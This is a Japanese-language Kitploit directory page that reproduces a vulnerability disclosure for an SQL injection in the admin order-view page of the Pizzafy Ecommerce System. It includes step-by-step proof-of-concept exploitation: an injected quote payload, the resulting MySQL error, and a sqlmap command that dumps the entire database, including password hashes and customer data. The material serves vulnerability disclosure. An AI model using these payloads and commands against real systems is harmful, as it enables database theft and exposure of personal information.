Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-7394-SQLI | Kitploit
ツール/GitHubGitHub/xmyronn/cve-2026-7394-sqli
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテストデータベースセキュリティ
GitHubxmyronn/cve-2026-7394-sqli

CVE-2026-7394-SQLI

リポジトリを見る
3ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Pizzafy Ecommerce System における SQL インジェクション — admin/view_order.php

詳細

フィールド値
ベンダーSourceCodester
製品PHPとMySQLを使用したPizzafy Ecommerce System
バージョン1.0
脆弱性SQLインジェクション
CWECWE-89
CVSSv3スコア7.2 (高)
攻撃ベクトルネットワーク
認証要件あり(管理者)
研究者Xmyronn
日付2026-04-11

https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html


影響を受けるコンポーネント

ファイル: Pizzafy/admin/view_order.php
パラメータ: id (GET)


説明

Pizzafy Ecommerce System 1.0のadmin/view_order.phpエンドポイントは、id GETパラメータをMySQLクエリに渡す前に適切にサニタイズしていません。認証された管理者がこのパラメータを操作して任意のSQLを注入でき、データベース全体を危険にさらす可能性があります。


概念実証

ステップ1 — 管理者としてログイン

以下にアクセスします:

root@kitploit:~
http://localhost/pizzafy/Pizzafy/admin/index.php

管理者の資格情報でログインします。

ステップ2 — 注文一覧へ移動

root@kitploit:~
http://localhost/pizzafy/Pizzafy/admin/index.php?page=orders
Screenshot 2026-04-11 212106

任意の注文エントリのView Orderをクリックします。 Screenshot 2026-04-11 212116

ステップ3 — Burp Suiteでリクエストを傍受

傍受したGETリクエストは次のようになります: Screenshot 2026-04-11 212135

ステップ4 — SQLエラーを発生させる

id=1をid='に変更します: Screenshot 2026-04-11 212145

root@kitploit:~
GET /pizzafy/Pizzafy/admin/view_order.php?id=' HTTP/1.1

レスポンス — MySQLエラーが露出:

root@kitploit:~
Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right
syntax to use near ''' at line 1 in
C:\xampp\htdocs\pizzafy\Pizzafy\admin\view_order.php:15

ステップ5 — sqlmapで悪用

リクエストをview_order.txtに保存して実行します:

root@kitploit:~
sqlmap -r view_order.txt --dump --batch
Screenshot 2026-04-11 212406

sqlmapで確認されたインジェクション種別:

種別タイトル
Boolean-based blindAND boolean-based blind — WHERE clause
Error-basedMySQL >= 5.0 FLOOR error-based
Time-based blindMySQL >= 5.0.12 SLEEP
UNION queryGeneric UNION query — 11 columns

データベース全体のダンプ:

root@kitploit:~
Database: pizzafy
Tables: users, user_info, orders, order_list, product_list, category_list, system_settings

露出した機密データには、bcryptパスワードハッシュ、顧客メールアドレス、注文詳細、システム設定が含まれます。


影響

悪意のある認証済み管理者(または管理者資格情報を入手した攻撃者)は、以下を行うことができます:

  • パスワードハッシュを含むデータベース全体をダンプする
  • 機密性の高い顧客の個人情報(氏名、メールアドレス、住所、電話番号)を読み取る
  • データベースへの書き込みができる可能性がある

参照

  • SourceCodester — Pizzafy Ecommerce System
  • CWE-89: SQLコマンドで使用される特殊要素の不適切な無害化
ツールをダウンロード